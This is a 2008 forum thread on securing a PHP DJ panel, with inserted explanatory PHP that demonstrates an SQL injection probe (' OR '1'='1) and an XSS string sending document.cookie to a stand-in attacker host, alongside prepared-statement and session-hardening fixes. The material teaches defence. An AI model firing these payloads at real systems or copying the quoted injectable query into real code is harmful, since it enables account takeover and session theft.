I need a more secure DJ panel



greggy23
19-04-2008, 11:31 AM
Yeah, I use QuickScriptz,
but I need a more secure one.
Please help.

Protege
19-04-2008, 11:47 AM
How secure can you be?

Moh
19-04-2008, 11:50 AM
I quite like Kristall-Panel RC2. I have edited it a lot though, so it's more secure.

greggy23
19-04-2008, 11:50 AM
The QuickScriptz one has been hacked 3 times
lol

Moh
19-04-2008, 11:52 AM
The QuickScriptz one has been hacked 3 times
lol
I don't think it's the panel; it will be your staff with passwords such as changeme.

We have made it so our passwords can't be changeme. And when a Radio Manager adds an account, their password is randomly generated. Best way to make it secure :D

Protege
19-04-2008, 11:53 AM
Oh god, how does it get hacked though? LOL, I just checked "check.php": it sets a SESSION for a password? No wonder it's insecure. I think the whole thing needs re-thinking, but no offence to the creator.


I don't think it's the panel; it will be your staff with passwords such as changeme.

We have made it so our passwords can't be changeme. And when a Radio Manager adds an account, their password is randomly generated. Best way to make it secure :D

I just checked one of its source files, and I think it's insecure.


$query = mysql_query("SELECT username,djname,passwrd,rank,email FROM rp_users WHERE username = '$username'") or die(mysql_error());
$row = mysql_fetch_array($query);
$_SESSION["rp_logged"] = TRUE;
$_SESSION["rp_username"] = $row['username'];
$_SESSION["rp_passwrd"] = $row['passwrd'];
$_SESSION["rp_djname"] = $row['djname'];
$_SESSION["rp_email"] = $row['email'];
$_SESSION["rp_rank"] = $row['rank'];
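The query quoted above drops `$username` straight into the SQL string. The thread never shows where check.php gets `$username` from; if it is the login name the user submitted, that line is injectable on its own, before any question of what the session holds. Worth keeping in mind for the later argument in the thread: whatever ends up in `$_SESSION['rp_username']` is copied from the database row, so a username containing a quote would also reach the second query unescaped if the panel's registration path ever let one in (not shown here). The block below is an added example, not QuickScriptz code or anything from the thread. It builds an in-memory SQLite table with the thread's column names (`rp_users`, `passwrd`, `rank`) and two constructed users, shows the interpolated lookup matching a row it should not when given `' OR '1'='1`, the same lookup as a prepared statement, and a session payload that carries only a user id and rank rather than the password hash. It assumes PHP 5.5 or later with the pdo_sqlite extension; `password_hash` stands in for whatever hash the 2008 panel used, and the removed `mysql_*` functions are replaced by PDO.

```php
<?php
// Added example, not part of the QuickScriptz panel. Runs offline from the CLI:
//   php login_example.php
declare(strict_types=1);

// Constructed fixture: same columns as the thread's rp_users table, plus an id.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE rp_users (id INTEGER PRIMARY KEY, username TEXT UNIQUE,
           djname TEXT, passwrd TEXT, rank INTEGER, email TEXT)');
$ins = $db->prepare('INSERT INTO rp_users (username, djname, passwrd, rank, email)
                     VALUES (?, ?, ?, ?, ?)');
$ins->execute(['admin',  'DJ Admin', password_hash('correct horse', PASSWORD_DEFAULT), 9, 'admin@example.invalid']);
$ins->execute(['greggy', 'Greggy',   password_hash('hunter2',       PASSWORD_DEFAULT), 1, 'greggy@example.invalid']);

// Shape of the query in check.php: $username is pasted into the SQL text.
// With $username = "' OR '1'='1" the WHERE clause becomes
//   username = '' OR '1'='1'
// which is true for every row, so the first row (admin) comes back.
function lookupInterpolated(PDO $db, string $username): ?array
{
    $sql = "SELECT username,djname,passwrd,rank,email FROM rp_users WHERE username = '$username'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Same lookup with a bound parameter: the quote is data, never SQL,
// so the same input matches no username and returns null.
function lookupPrepared(PDO $db, string $username): ?array
{
    $stmt = $db->prepare('SELECT id, username, djname, passwrd, rank, email
                          FROM rp_users WHERE username = ?');
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Session payload for a successful login, or null on failure.
// Only a stable identifier and the rank go in: the hash stays in the database,
// and later pages look the user up by id instead of carrying a hash around.
function login(PDO $db, string $username, string $password): ?array
{
    $row = lookupPrepared($db, $username);
    if ($row === null || !password_verify($password, $row['passwrd'])) {
        return null;
    }
    return ['rp_logged' => true, 'rp_user_id' => (int) $row['id'], 'rp_rank' => (int) $row['rank']];
}

$probe = "' OR '1'='1";
$hit = lookupInterpolated($db, $probe);
var_dump($hit['username'] ?? null);       // interpolated query: a real account's row
var_dump(lookupPrepared($db, $probe));    // prepared query: no such user
var_dump(login($db, 'greggy', 'hunter2')); // correct password: minimal session payload
var_dump(login($db, 'greggy', 'wrong'));   // wrong password: no payload
```

On a real page the array returned by `login()` is what gets assigned to `$_SESSION`; the lookup on every later request then uses `rp_user_id` with a prepared statement, which is also what makes a changed or reset password take effect immediately instead of living on in a copied hash.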

=Collecting=
19-04-2008, 12:06 PM
Oh god, how does it get hacked though? LOL, I just checked "check.php": it sets a SESSION for a password? No wonder it's insecure. I think the whole thing needs re-thinking, but no offence to the creator.



I just checked one of its source files, and I think it's insecure.


$query = mysql_query("SELECT username,djname,passwrd,rank,email FROM rp_users WHERE username = '$username'") or die(mysql_error());
$row = mysql_fetch_array($query);
$_SESSION["rp_logged"] = TRUE;
$_SESSION["rp_username"] = $row['username'];
$_SESSION["rp_passwrd"] = $row['passwrd'];
$_SESSION["rp_djname"] = $row['djname'];
$_SESSION["rp_email"] = $row['email'];
$_SESSION["rp_rank"] = $row['rank'];

So the panel can be hacked via that file?

Protege
19-04-2008, 12:07 PM
Ever heard of session stealing? They publish the user's password via a SESSION. It's like putting it in a file on your server and calling it index.html looooooool

=Collecting=
19-04-2008, 12:09 PM
Ever heard of session stealing? They publish the user's password via a SESSION. It's like putting it in a file on your server and calling it index.html looooooool

Yeah, but I'm just not sure exactly how it all works. I mean, I use CuteNews, but the person who hacked that didn't change anything; he just left a message saying delete search.php. I take it change.php with the DJ panel works in the same way?

Protege
19-04-2008, 12:19 PM
I don't understand, maybe he's using a PHP exploit?

=Collecting=
19-04-2008, 12:23 PM
Well anyway, need to either make this DJ panel safe or get a safer one. Any recommendations?

Protege
19-04-2008, 12:28 PM
Lots of people out there to make bigger and better panels.

timROGERS
19-04-2008, 01:30 PM
Ever heard of session stealing? They publish the user's password via a SESSION. It's like putting it in a file on your server and calling it index.html looooooool

Drift, I think you're wrong about sessions being that easy to steal. The only reason that you could steal sessions from the Habbo site was that it had a vulnerability due to an XSS (Cross-Site Scripting) issue. In general, you can't steal sessions unless there is a browser exploit or some bad coding somewhere.

I recall that the problem with the Habbo website was that some input was loaded through a URL (GET) parameter and it wasn't filtered, so things could be done. If you're interested in finding out more, I suggest you read http://en.wikipedia.org/wiki/Session_hijacking and http://en.wikipedia.org/wiki/Cross-site_scripting.
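The route described here (an unfiltered GET parameter echoed into the page, injected script reading the session cookie and sending it elsewhere) is what turns a server-side session into something an attacker can borrow. The block below is an added example, not code from the panel or from anyone in the thread, showing the PHP-side settings that close the easy versions of that attack: a session cookie the browser won't expose to script, a session ID that is replaced at login, strict mode so a planted ID is never accepted, and output escaping for anything echoed from the request. It assumes PHP 7.3 or later for the array form of `session_set_cookie_params`, a site served over TLS (the `secure` flag), and the hostname `attacker.invalid` in the probe string is constructed.

```php
<?php
// Added example, not from the QuickScriptz panel. Include from a web entry
// point; run from the CLI it only exercises renderDjName().
declare(strict_types=1);

// Session cookie and ID handling that removes the simple hijack routes.
function startHardenedSession(): void
{
    // Refuse session IDs the server never issued (defeats session fixation).
    ini_set('session.use_strict_mode', '1');
    // The ID travels only in the cookie, never in URLs where it gets logged or shared.
    ini_set('session.use_only_cookies', '1');
    ini_set('session.use_trans_sid', '0');
    // HttpOnly: document.cookie cannot read the ID, so injected script has nothing
    // to exfiltrate. Secure: the cookie is only sent over TLS. SameSite=Lax: it is
    // not attached to cross-site POSTs.
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
    session_start();
}

// Call right after the password check succeeds. A fresh ID means any ID an
// attacker captured or planted before login no longer maps to the logged-in
// session; the session array is rebuilt from scratch with the minimum needed.
function promoteSession(int $userId, int $rank): void
{
    session_regenerate_id(true);
    $_SESSION = ['rp_logged' => true, 'rp_user_id' => $userId, 'rp_rank' => $rank];
}

// Anything that came from the request goes through htmlspecialchars() before
// it is echoed; the tags arrive in the page as text and never execute.
function renderDjName(string $fromRequest): string
{
    return '<h1>Now on air: '
        . htmlspecialchars($fromRequest, ENT_QUOTES | ENT_HTML5, 'UTF-8')
        . '</h1>';
}

if (PHP_SAPI !== 'cli') {
    startHardenedSession();
}

// Constructed probe of the kind described in the post: script that would ship
// the cookie to a third party if it were echoed unescaped.
$probe = '<script>new Image().src="//attacker.invalid/?c="+document.cookie</script>';
echo renderDjName($probe), PHP_EOL;
```

`promoteSession()` belongs in the login handler, between the password check and the redirect; the per-request check on later pages should then look the user up by `rp_user_id` with a prepared statement rather than trusting anything else copied into the session.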

Dentafrice
19-04-2008, 01:36 PM
Oh god, how does it get hacked though? LOL, I just checked "check.php": it sets a SESSION for a password? No wonder it's insecure. I think the whole thing needs re-thinking, but no offence to the creator.



I just checked one of its source files, and I think it's insecure.


$query = mysql_query("SELECT username,djname,passwrd,rank,email FROM rp_users WHERE username = '$username'") or die(mysql_error());
$row = mysql_fetch_array($query);
$_SESSION["rp_logged"] = TRUE;
$_SESSION["rp_username"] = $row['username'];
$_SESSION["rp_passwrd"] = $row['passwrd'];
$_SESSION["rp_djname"] = $row['djname'];
$_SESSION["rp_email"] = $row['email'];
$_SESSION["rp_rank"] = $row['rank'];


Ever heard of session stealing? They publish the user's password via a SESSION. It's like putting it in a file on your server and calling it index.html looooooool

Sessions are on the remote server and can't be edited; there is nothing wrong with that piece of code.

As long as the password is a hash and not plaintext, setting it in a session is alright. Not the best practice in the world, but no harm done.

With Habbo, they were getting the user's session ID and setting it as their own, then it would recognize you as them.

Protege
19-04-2008, 01:48 PM
One little exploit in his coding could get the server to set false sessions; seeing as his sessions are used against the database, I'd say that's extremely vulnerable.


if($_SESSION['rp_logged'] == "TRUE") {
$username = $_SESSION['rp_username'];
$passwrd = $_SESSION['rp_passwrd'];
$rank = $_SESSION['rp_rank'];
$check = mysql_query("SELECT username, passwrd FROM rp_users WHERE username = '$username'")or die(mysql_error());

Dentafrice
19-04-2008, 01:51 PM
I don't see any exploits in that.

Protege
19-04-2008, 01:54 PM
if($_SESSION['rp_logged'] == "TRUE") {
>> $username = $_SESSION['rp_username']; <<
$passwrd = $_SESSION['rp_passwrd'];
$rank = $_SESSION['rp_rank'];
$check = mysql_query("SELECT username, passwrd FROM rp_users WHERE username = ' >>> $username <<<'")or die(mysql_error());

I do. I'm sorry if you don't; I've had this problem in the past.

Dentafrice
19-04-2008, 02:08 PM
LOL, there is nothing wrong with that at all. You're just selecting something out of a database. I would rather use the ID instead of a username.

Protege
19-04-2008, 02:32 PM
LOL, there is nothing wrong with that at all. You're just selecting something out of a database. I would rather use the ID instead of a username.

Yeah, but it's going past one validation before it writes the new sessions?

I think that this system is easily exploitable by the right individual.

greggy23
19-04-2008, 07:53 PM
Mod can close this,
I got a new panel :D !

Moh
19-04-2008, 08:00 PM
Mod can close this,
I got a new panel :D !
What panel you using?

QuickScriptz
20-04-2008, 12:17 AM
Ever heard of session stealing? They publish the user's password via a SESSION. It's like putting it in a file on your server and calling it index.html looooooool

Well, I was about to start a big long rant about this until I saw these two posts below. Just take a look at them, and yes, the session that is being set contains the hashed password (I'm not stupid).


Drift, I think you're wrong about sessions being that easy to steal. The only reason that you could steal sessions from the Habbo site was that it had a vulnerability due to an XSS (Cross-Site Scripting) issue. In general, you can't steal sessions unless there is a browser exploit or some bad coding somewhere.

I recall that the problem with the Habbo website was that some input was loaded through a URL (GET) parameter and it wasn't filtered, so things could be done. If you're interested in finding out more, I suggest you read http://en.wikipedia.org/wiki/Session_hijacking and http://en.wikipedia.org/wiki/Cross-site_scripting.


Sessions are on the remote server and can't be edited; there is nothing wrong with that piece of code.

As long as the password is a hash and not plaintext, setting it in a session is alright. Not the best practice in the world, but no harm done.

With Habbo, they were getting the user's session ID and setting it as their own, then it would recognize you as them.

Okay, now get ready for the [poop] to hit the fan....


if($_SESSION['rp_logged'] == "TRUE") {
>> $username = $_SESSION['rp_username']; <<
$passwrd = $_SESSION['rp_passwrd'];
$rank = $_SESSION['rp_rank'];
$check = mysql_query("SELECT username, passwrd FROM rp_users WHERE username = ' >>> $username <<<'")or die(mysql_error());

I do. I'm sorry if you don't; I've had this problem in the past.

In order for this to be a flaw, the user would have to create a session called "rp_username" that contained the malicious code. The problem here is that sessions are all server-side, therefore the user has no real control over them.

So, on a closing note, if you have the latest security updates to the panel, then there is absolutely nothing [that I know of or that anyone has told me of] that would make the panel vulnerable to being hacked three different times.

greggy23
20-04-2008, 03:30 PM
What panel you using?
Using Kristall :)
